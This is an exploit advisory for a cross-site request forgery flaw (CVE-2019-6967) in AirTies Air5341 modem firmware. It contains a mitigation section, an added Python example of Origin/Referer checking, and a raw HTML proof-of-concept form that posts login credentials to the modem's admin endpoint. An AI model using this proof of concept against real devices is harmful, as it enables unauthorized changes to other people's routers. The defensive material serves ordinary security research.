vendor: Air5341 Modem
by: Ali Can Gönüllü
CVSS: 8.8 HIGH
CWE: 352 (Cross-Site Request Forgery), CSRF
Product Name: Air5341 Modem
Affected Version From: AirTies Modem Firmware 1.0.0.12
Affected Version To: AirTies Modem Firmware 1.0.0.12
Patch Exists: NO
Related CWE: CVE-2019-6967
CPE: a:airties:air5341_firmware:1.0.0.12
Platforms Tested: Windows 10 x64

AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC

This exploit allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks on AirTies Air5341 1.0.0.12 Modems. By tricking a user into clicking on a malicious link, the attacker can perform unauthorized actions on behalf of the user, such as changing the modem settings or stealing sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update the AirTies Modem Firmware to a version that includes a fix for this issue. Additionally, users should be cautious when clicking on links from untrusted sources.
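
The server-side check that closes this class of bug (CWE-352) is to reject state-changing requests that did not originate from the device's own pages. The following is an added example, not part of the original advisory and not AirTies code; the function names are hypothetical, the device origin 192.168.2.1 is taken from the PoC's form action, and the sample requests are constructed.

```python
from urllib.parse import urlsplit

# Origin of the admin interface, taken from the PoC's form action.
DEVICE_ORIGINS = {("http", "192.168.2.1", 80)}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Return (scheme, host, port) for a URL, or None if it has no usable origin."""
    try:
        parts = urlsplit(url)
        port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    except ValueError:  # malformed host or port
        return None
    if not parts.hostname or port is None:
        return None
    return (parts.scheme, parts.hostname.lower(), port)


def allow_request(method, headers, allowed=DEVICE_ORIGINS):
    """Decide whether a request to the admin interface may proceed.

    Safe methods pass. State-changing methods must show they came from the
    device's own pages via Origin, falling back to Referer. A request that
    carries neither header is rejected (fail closed).
    """
    if method.upper() not in STATE_CHANGING:
        return True
    h = {k.lower(): v for k, v in headers.items()}
    # Browsers that send Fetch Metadata label cross-site requests explicitly.
    if h.get("sec-fetch-site") == "cross-site":
        return False
    source = h.get("origin") or h.get("referer")
    if not source or source == "null":
        return False
    return origin_of(source) in allowed


if __name__ == "__main__":
    # Constructed requests: the device's own login page, then a foreign page.
    samples = [
        ("POST", {"Origin": "http://192.168.2.1"}),
        ("POST", {"Origin": "http://other-site.example"}),
        ("POST", {}),
    ]
    for method, headers in samples:
        print(method, headers, "->", allow_request(method, headers))
```

Header checks of this kind complement a per-session anti-CSRF token on the settings forms; they do not replace one.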

Exploit-DB raw data:

# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
    <input type="hidden" id="redirect" name="redirect">
    <input type="hidden" id="self" name="self">
    <input name="user" type="text" id="uiPostGetPage" value="admin" size="">
    <input name="password" type="password" id="uiPostPassword" size="">
    <input onclick="uiDologin();" name="gonder" type="submit" class="buton_text" id="__ML_ok" value="TAMAM" style="background-image:url(images/buton_bg2.gif); height:21px; width:110px; border: 0pt  none">
</form>
</html>